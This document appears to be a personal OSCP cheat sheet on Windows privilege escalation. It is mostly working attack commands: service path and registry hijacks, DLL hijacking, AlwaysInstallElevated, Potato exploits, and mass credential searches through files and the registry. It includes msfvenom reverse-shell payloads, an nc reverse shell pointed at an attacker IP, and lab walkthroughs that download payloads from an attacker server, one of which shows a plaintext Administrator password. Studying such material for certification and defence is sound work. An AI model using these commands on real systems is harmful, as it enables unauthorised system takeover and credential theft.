In the OSCP exam, Only Gaining access is not enough. Most of the machines may require to escalate to higher privilege. To learn more about windows privilege escalation I have taken a course from Udemy, watching IPSec youtube video, and reading tutorials from various sources. Whatever i have learned, took note.
I have organized my notes as a cheat sheet and now it is public.
Note:
A cheat sheet is not understandable without basic knowledge! After all cheat sheet is not a tutorial!
Checklist
I would like to follow two standard and cheatsheet online:
Helpful Tools
- WinPeas: This tool check common misconfiguration that may lead to escalating privilege.
- PowerUP: It is a Powershell script to check common vulnerability.
- Windows-Exploit-Suggester: It is a Windows Kernel Exploit suggester.
- icacls(Windows): Display Access Control List on Specified files.
Example:
All tools first need to be transferred to the target machine!
Winpeas:
.\winpeas.exe
.\winpeas.exe serviceinfo
PowerUp:
powershell.exe -exec bypass
. .\PowerUp.ps
Invoke-AllChecks
Wiindows Exploit Suggester:
From the target first collect the output of systeminfo command and save in Kali.
python windows-exploit-suggester.py -u
python windows-exploit-suggester.py -i systeminfo.txt -u *.xls
icacls:
icacls "path_to_check"
Enumeration
We need to enumerate for basic information before attempting to escalate privilege.
#Get Windows Version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
#Get patch Information
wmic qfe get Caption, Description, HotFixID, InstalledOn
#Get current username
whoami
#Get groups and permission information
whoami username /all
#get user list
net user
#get information for specific user
net user admin
#Get OS information like version, hotfix etc.
systeminfo
#List all running process. Keep Note the suspicious one!
netstat -ano
#List all profile's firewall rules!
netsh advfirewall firewall show rule name=all
#List all installed software.
wmic product get name
#List all installed software and version.
wmic product get name, version
#Get scheuduled task list
schtasks /query /ms LIST /v
#Running Process
tasklist /SVC
#Vulnerable Drivers
driverquery.exe /fo table
Kernel Exploits
Kernel Exploit could be dangerous. So any kernel exploit should be run if there is no other way to escalate the privilege.
Get System Information and transfer to remote Linux host. This is the command we need to run before we find exploits on Google or Searchsploit:
$ systeminfo
Use Windows Exploit Suggester to get exploit suggestions:
python windows-exploit-suggester.py -u
python windows-exploit-suggester.py -i systeminfo.txt -u *.xls
We can use the information generated by Windows-exploit-suggester to find compiled exploit in the following link:
https://github.com/SecWiki/windows-kernel-exploits
Find Exploit in Google and Searchsploit. Example:
Google> Windows Version Privilege Escalation Exploit Searchsploit> $ searchsploit windows 10
Service Exploits
If a service improperly configured, it may lead to escalate to higher privilege. 5 way service can be exploited.
- Insecure Service Permission
- Unquoted Service Path
- Insecure Registry Permission
- Insecure Service Executable
- DLL Hijacking
Service Enumeration
We should find out all running services and the version.
#cmd
tasklist /SVC
#powershell
Get-Service
#wmic
wmic service list brief
Listing All Running Services
sc queryex type=service
powershell.exe -c "Get-Service | Where-Object {$_.Status -eq "Running"}
"
Search for more info against a suspicious service with this cmd/powershell command
sc queryex type=service state=all | find /i "SERVICE_NAME: service_name"
#or
powershell.exe -c "Get-Service | Where-Object {$_.Name -like "*service_name*"}
Find the status of the target services! We can check with these command.
sc query service_name
Get-Service service_name
Modifying a service binary path
sc config service_name binpath='c:\windows\temp\shell.exe'
Start and Stop a Service
net start serv_name
net stop serv_name
Exploit Insecure Services Permission
We need to find a suspicious service name. If a service running with permission SERVICE_CHANGE_CONFIG
or SERVICE_ALL_ACCESS
, We can exploit it by changing its binary path.
sc qc service_name
sc config service_name binpath="c:\windows\temp\backdoor.exe"
net stop service_name
net start service_name
Exploiting Unquoted Service Path
If a service not enclosed within the quote, it may help us to escalate the privilege. Anyone folder of the service path needs to be writable. For example, I found C:\Program Files\Deploy Ready\Service Files\Deploy.exe. In C:\Program Files\ Directory, The “Deploy Ready” and “Service Files” subdirectory is writable. We can exploit this vulnerability to escalate the privilege. How does it work?
- When starting the service, if it failed to execute Deploy.exe
- It will execute C:\Program Files\Deploy Ready\Service.exe
- If Service.exe was not found, C:\Program Files\Deploy.exe will be executed!
Find Vulnerability
#Manually
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
#With winpeas
.\winPEAS.exe quiet servicesinfo
Test If any directory is writable:
- Manually
echo "Test";"C:\Path a\Path b\Path c\test.txt" #no permission denied? We are fine then
icacls "C:\Path a\Path b\Path c\test.txt" #F=Full, W=Write
- With Accesschk(More efficient)
.\accesschk.exe /accepteula -uwdq C:\
.\accesschk.exe /accepteula -uwdq "C:\Program Files\"
.\accesschk.exe /accepteula -uwdq "C:\Program Files\Service Path"
Exploit
If we don’t have permission to restart the service we can try to reboot the machine. And if the service configured AUTO_START and run as LocalSystem, we will get a system shell
sc qc "service_name"
copy \\smb_ip\\Service.exe "C:\Program Files\Deploy Ready\Service.exe"
net start service_name
#If unable to start the service try rebooting
shutdown /r /t 0
Insecure Registry Permission
If we can’t write to a service directory/folder, but can modify or write to registry, we can escalate the privilege.
Find Services
#Get All Services info
.\winPEAS.exe quiet servicesinfo
#Get All Services info
.\winPEAS.exe quiet servicesinfo
reg query hklm\System\CurrentControlSet\Services /s /v imagepath
Confirm Registry weak permission
#Confirm Weak Permission with Powershell command
Get-Acl HKLM:\System\CurrentControlSet\Services\SrvName |Format-List
#Confirm with accesschk
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\SrvName
Exploit
If we are confirm that we can modify the registry:
#Add Backdoor to the Registry
reg add HKLM\SYSTEM\CurrentControlSet\srevices\SrvName /v ImagePath /t REG_EXPAND_SZ /d C:\windows\temp\backdoor.exe /f
#Start the service
net start SrvName
DLL Hijacking
If a program or service can’t load a dll file in specified directory, we can supply our own malicious dll for escalation. The DLL loading folder need to be writable!
Check Permission of the Program folder
icacls C:\program\
Create Malicious Dll File and move the payload to program specified directory.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attack_IP LPORT=attacker_port -f dll -o exsisting.dll
Now Try restart the service or execute the vulnerable program
Exploit Startup Program
We need to copy the accesschk64.exe to remote host to check permission. If a program has FILE_ALL_ACCESS permission, we can exploit it for system shell.
accesschk64.exe -wvu “C:\Program Files\Autorun Program”
copy \\smb_ip\backdoor.exe “C:\Program Files\Autorun Program\program.exe”
We can also get admin session by exploiting startup applications. Check the permission. If the folder has write permission, we just need to copy our shell.exe to that folder and wait for admin to login.
icacls.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”
copy \\smb_ip\bak.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\bak.exe”
Exploiting AlwaysInstallElevated
We need to check if it is enabled. If the value is 0x1, we can exploit it!
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
Generate backdoor with metasploit, and Transfer to victim machine
msfvenom -p windows\x64\meterpreter\reverse_tcp LHOST=tester_ip LPORT=tester_port -f msi -o smb-folder\shell.msi
Copy shell.msi to victim machine using SMB or other way and run:
msiexec /quiet /qn /i shell.msi
Exploiting Clear Text password
If we are in luck we may found password in clear text.
Note: This section heavily copied from https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials
Finding WIFI password
netsh wlan show profile netsh wlan show profile <SSID> key=clear
Search Sensitive Files that may have credential
cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == "Login Data" == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2>nul | findstr /v ".dll"
Search for “Password"
#Search suspicious files from filename
dir /s /W *pass* == *cred* == *vnc* == *.config* | findstr /i/v "\\windows"
#Search suspicious files from content
findstr /D:C:\ /si password *.xml *.ini *.txt #A lot of output can be generated
findstr /D:C:\ /M /SI password *.xml *.ini *.txt 2>nul | findstr /V /I "\\AppData\\Local \\WinXsX ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.CloudExperienceHost" 2>null
Search Password in Registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" #Autologin
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s #Check the values saved in each session, user/password could be there
reg query "HKCU\Software\OpenSSH\Agent\Key"
# Search for passwords inside all the registry
reg query HKLM /f password /t REG_SZ /s #Look for registries that contains "password"
reg query HKCU /f password /t REG_SZ /s #Look for registries that contains "password"
Try With Winpeas:
.\winPEAS.exe quiet filesinfo userinfo
RunAS
Using cmdkey
cmdkey /list
runas /savecred /user:Administrator "c:\windows\temp\backdoor.exe"
By providing credentials
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
Exploiting Well known Software
Some software installed in the target machine may have public exploit to use. We should google search for a exploit with the version of installed software.
tasklist /v
.\winpeas.exe quiet processinfo
Schedule Task
#from CMD
schtasks /query /fo LIST /v
#In Powershell
PS> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
For example above command found C:\Tools\Adm.Ps1 is running every 10 minutes as system and we have rights to modify it:
accesschk.exe /accepteula -quvw user C:\Tools\Adm.Ps1
We simply can append our command to execute as system. Let’s append command to run rev.exe(Reverse shell to port 443):
echo C:\windows\temp\rev.exe>> C:\Tools\Adm.Ps1
If everything goes well, we should have shell as system in 10 minutes!
Dangerous User Privileges
Some privileges for a user is dangerous. They could lead to escalate to higher privilege I will list some of them:
SEImpersonatePrivilege
It can act as any other user, such as, Administrator. The vulnerability could be exploited with JuicyPotato
SeAssignPrimaryPrivilege
Assign an access token to new process. Can be exploited with JuicyPotato
SeBackUpPrivilege
If a user has this privilege he is able to read files. That’s mean the user can extract password/hash from registry which could be used for pass-the-hash attack
SeRestorePrivilege
This privilege grant a user to modify service binary, dll, also modify registry settings
Others risky Privilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeDebugPrivilege
Hot Potato Exploit
A Tutorial: https://pentestlab.blog/2017/04/13/hot-potato/
Windows 7
.\Potato.exe -ip <local ip> -cmd <command to run> -enable_defender true -enable_spoof true -disable_exhaust true
Windows 10
.\Potato.exe -ip <local ip> -cmd <cmd to run> -disable_exhaust true -disable_defender true
Juicy Potato
If SeImpersonate/SeAssignPrimaryToken JuicyPotato can be used to escalated privilege.
Note: CLSID can be found in: https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
JuicyPotato.exe -l 4444 -p C:\Windows\Temp\Rev.exe -t * -c {CLS_ID}
Rogue Potato
Just another Windows Local Privilege Escalation from Service Account to System. So the requirement is the accessed account needed to be a service account.
.\RoguePotato.exe -r 192.168.1.11 –l 9999 -e "C:\Windows\Temp\rev.exe
Quick Real Example
The same way we can add a root user to the /etc/passwd!
Unquoted Service
systeminfo
Host Name: DEPLOYABLE
OS Name: Microsoft Windows Server 2012 R2 Datacenter
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
--------------------------------------------------
>whoami /all
whoami /all
USER INFORMATION
User Name SID
================= =============================================
deployable\tomcat S-1-5-21-2340103987-1023754366-731290932-1001
GROUP INFORMATION
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
.......
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
.......
PRIVILEGES INFORMATION
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
> wmic product get name, version
>
> powershell -c Invoke-WebRequest "http://10.10.0.67:8000/WinPeas.exe" -OutFile "wino.exe"
> .\wino.exe serviceinfo
......
Deploy(Deploy)[C:\Program Files\Deploy Ready\Service Files\Deploy.exe] - Manual - Stopped - No quotes and Space detected
......
> cd "C:\Program Files\Deploy Ready\"
Generating the Exploit in Kali, Starting Python Server and Listening for connection:
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.0.67 LPORT=1337 -f exe > Deploy.exe
$ python3 -m http.server
$ nc -lvp 1338
Downloading and running exploit in windows:
sc qc deploy
>powershell -c Invoke-WebRequest "http://10.10.0.67:8000/Deploy.exe" -OutFile "C:\Program Files\Deploy Ready\Service.exe"
>sc start deploy
Clear Text Password
I was just able to get shell with exploiting blogengin. Uploaded winpeas and it was able to find AutoLogon Credential
Here is the step i did in kali to get Administrator access:
winexe -U Administrator%PzCEKhvj6gQMk7kA //172.3.1.6 cmd.exe
Escalated with JuicyPotato
If the user has SeImpersonate
or SeAssignPrimaryToken
privileges then you are SYSTEM.
Note: Juicy Potato doesn’t work on Windows Server 2019 and Windows 10 1809 +.
Generated another Shell:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.0.67 LPORT=1338 -f exe>shell1338.exe
Uploaded JuicyPotato.exe and the shell1338.exe:
powershell -c Invoke-WebRequest "http://10.10.0.67:8000/shell1338.exe" -OutFile "shell1338.exe"
powershell -c Invoke-WebRequest "http://10.10.0.67:8000/JuicyPotato.exe" -OutFile "JuicyPotato.exe"
Execute for system shell(CLS ID can be found in: http://ohpe.it/juicy-potato/CLSID/ and https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md , Note tested):
JuicyPotato.exe -t * -l 1010 -p shell1338.exe
JuicyPotato.exe -t * -l 1010 -p shell1338.exe -c {cls_id}
Modify Binary to Escalate
I was logged in to evil-winrm. Windpeas did not find anything. So i tried manual enumeration. Here is the step of escalation:
Evil-WinRM PS C:> services
Path Privileges Service
---- ---------- -------
"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" False AmazonSSMAgent
"C:\Program Files\Amazon\XenTools\LiteAgent.exe" False AWSLiteAgent
"C:\Program Files\Amazon\cfn-bootstrap\winhup.exe" False cfn-hup
C:\Services\monitor1.exe True monitor1
C:\Services\monitor2.exe True monitor2
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe False PerfHost
C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller
Evil-WinRM PS C:> icacls Services\monitor1.exe
Services\monitor1.exe BUILTIN\Users:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
Successfully processed 1 files; Failed processing 0 files
Evil-WinRM PS C:\services> upload /home/bytef/cybsec/monitor1.exe
Info: Uploading /home/bytef/cybsec/monitor1.exe to C:\services\monitor1.exe
Data: 98400 bytes of 98400 bytes copied
Info: Upload successful!
Evil-WinRM PS C:\services> cmd /c "sc start monitor1"
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
Evil-WinRM PS C:\services>
And quickly i got system shell